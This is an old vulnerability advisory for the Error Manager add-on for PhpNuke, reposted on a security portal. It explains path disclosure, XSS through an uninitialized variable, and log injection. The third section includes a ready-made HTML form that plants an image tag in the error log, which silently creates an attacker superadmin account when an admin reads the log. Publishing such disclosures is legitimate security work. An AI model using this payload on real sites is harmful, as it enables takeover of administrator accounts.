Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
June 26, 2022
 Members List
 IRC chat
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 Sql Char Encoder
 y3dips ITsec
 Md5 Cracker
 User Manuals
 Recommend Us
 Your Account

User Info
Welcome, Anonymous

Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 299
Members: 0
Total: 299
PacketStorm News
Currently there is a problem with headlines from this site
[waraxe-2004-SA#010] - Multiple vulnerabilities in Error Manager v2.1 for PhpNuke

Author: Janek Vind "waraxe"
Date: 18. March 2004
Location: Estonia, Tartu

Affected software description:

From developer's readme file:

This Error Manager is made by Gijza.net
The idea came from DR3N.tk
This addon is made for PHP-NUKE 6.0. but may work for other versions
Admin CP is also included in this version.
For the latest version go to www.gijza.net


1. Full path disclosure

Let's look at original code:

if( isset( $newlang ) ) {
include( "language/error/lang-$newlang.php" );
$language = $newlang;
} elseif ( isset( $lang ) ) {
include( "language/error/lang-$lang.php" );
$language = $lang;
} else {
include( "language/error/lang-$language.php" );

So - nothing will stop us to request this php file directly and this can lead to
standard php error messages, revealing us the full path to error.php file:


Warning: main(language/error/lang-foobar.php): failed to open stream: No such file or directory in D:apache_wwwroot
uke71error.php on line 19

2. Cross-Site Scripting aka XSS

Again, let's look at original code:

if ($error == 401) {
$pagetitle = "- "._EM401."";
if ($error == 403) {
$pagetitle = "- "._EM403."";
if ($error == 404) {
$pagetitle = "- "._EM404."";
if ($error == 500) {
$pagetitle = "- "._EM500."";

This is traditionally coded by using the "switch/case" language constructions, but
for some reason the author uses there "if/if/if/..." construction, not even "if/elseif/elseif/else".
And we can see, that if variable $error is not the 401, 403, 404 or 500, but something else, then
we can UNINITIALIZED $pagetitle set to any value. This will lead of course to XSS conditions:

http://localhost/nuke71/error.php?pagetitle=[xss code here]

One more way to XSS exploiting:

http://localhost/nuke71/error.php?error=>[xss code here]

As with all the PhpNuke XSS cases, using of the POST parameters or even better - COOKIE parameters -
will be preffered, because the GET parameters are strictly filtered in mainfile.php .

3. Script injection to error log (nasty one!)

This one is my favourite bug. I mean - Error Manager is suppose to log the error conditions in web server
and therefore admin can find potential bugs on site and of course this logging feature will reveale to
admin many (unsuccessful) attacks by "bad guys". It's shame, but it's true - error logging in Error Manager
will log referer, request URI , etc, but WITHOUT ANY sanityze against html tags ;)
So we can inject any javascript code to error log and when admin will browse the logs, the website can be
compromised - for example cookies can be stealed, additional superadmin accounts can be created without the
knowledge of the admin (refference to [waraxe-2004-SA#008 - easy way to get superadmin rights in PhpNuke 6.x-7.1.0]) etc ...

So, there is an attack scenario:

Write the html file like this one -

<HEAD><TITLE>Error Manager sploit</TITLE>
<BODY bgcolor="#000000" text="#FFFFFF">

<FORM action="http://www.victim.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' border='0' src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">




Use it aginst victim server and then just wait, till admin reads the error log and then
login to your brand new superadmin account ;)


Greets to torufoorum staff and to all IT security related people in Estonia! Tervitused!
Special greets to ulljobu!


Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------

Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2005-01-06 (23293 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 737
pexli  pexli - 665
Mullog  Mullog - 540
demon  demon - 485
shai-tan  shai-tan - 477
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
·Vuln: Oracle Java SE CVE-2015-4860 Remote Security Vulnerability
·Vuln: Oracle Java SE CVE-2015-4872 Remote Security Vulnerability
·Vuln: Oracle Java SE CVE-2015-4911 Remote Security Vulnerability
·Vuln: Oracle Java SE CVE-2015-4903 Remote Security Vulnerability
·Bugtraq: [SECURITY] [DSA 3413-1] openssl security update
·Bugtraq: [SECURITY] [DSA 3412-1] redis security update
·Bugtraq: [security bulletin] HPSBGN03525 rev.1: HP Performance Center Virtual Table Server, Remote Code Execution
·Bugtraq: ESA-2015-171 EMC NetWorker Denial-of-service Vulnerability
·More rss feeds from SecurityFocus


Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.120 Seconds